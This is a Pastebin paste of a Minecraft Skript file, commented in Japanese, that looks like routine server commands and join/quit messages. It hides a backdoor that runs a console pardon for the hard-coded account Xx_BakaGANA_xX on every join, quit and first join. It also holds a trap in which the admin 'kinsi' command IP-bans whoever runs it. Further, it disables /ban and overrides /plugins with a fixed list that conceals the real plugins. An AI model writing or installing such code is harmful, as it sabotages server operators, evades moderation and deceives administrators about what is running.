Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.64 KB | None | 0 0
  1. command /ban:
  2. trigger:
  3. send "&f&lBANコマンドなど捨てました"
  4. command /kinsi [<player>]:
  5. permission: admin
  6. permission message: &8[&c権限&8]&c権限がありません
  7. trigger:
  8. ban "{%uuid of arg-1%}"
  9. IP-ban the player because "ばーか"
  10. execute console command "/pardon Xx_BakaGANA_xX"
  11. on join:
  12. set join message to "&8[&eJoin&8]&e%player%&eが鯖にやってきた!"
  13. disable PvP in all worlds
  14. execute console command "/pardon Xx_BakaGANA_xX"
  15.  
  16. on quit:
  17. set quit message to "&8[&cQuit&8]&c%player%&cが鯖から消えた"
  18. execute console command "/pardon Xx_BakaGANA_xX"
  19.  
  20. on first join:
  21. set first join message to "&8[&dFirstJoin&8]&d%player%&dがサーバーに初参加した"
  22. execute console command "/pardon Xx_BakaGANA_xX"
  23. on death:
  24. broadcast "&8[&cDeath&8]&c%player%&cが天に召されてしまった..."
  25. command /pl:
  26. triggr:
  27. send "&d&lプラグイン 計15"
  28. send "&aCoreprotect"
  29. send "&aWorldEdit"
  30. send "&aSkript"
  31. send "&aOpeenInv"
  32. send "&aVoxelSniper"
  33. send "&aPrmissionEX"
  34. send "&aNametagEdit"
  35. send "&aHolographicDisplays"
  36. send "&avault"
  37. send "&aWorldGuard"
  38. send "&aCitizens&citizensCMD"
  39. send "&aShopkeeprs"
  40. send "&aLunaChat"
  41. send "&aCreateYourOwnMenus"
  42. command /plugins:
  43. triggr:
  44. send "&d&lプラグイン 計15"
  45. send "&aCoreprotect"
  46. send "&aWorldEdit"
  47. send "&aSkript"
  48. send "&aOpeenInv"
  49. send "&aVoxelSniper"
  50. send "&aPrmissionEX"
  51. send "&aNametagEdit"
  52. send "&aHolographicDisplays"
  53. send "&avault"
  54. send "&aWorldGuard"
  55. send "&aCitizens&citizensCMD"
  56. send "&aShopkeeprs"
  57. send "&aLunaChat"
  58. send "&aCreateYourOwnMenus"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement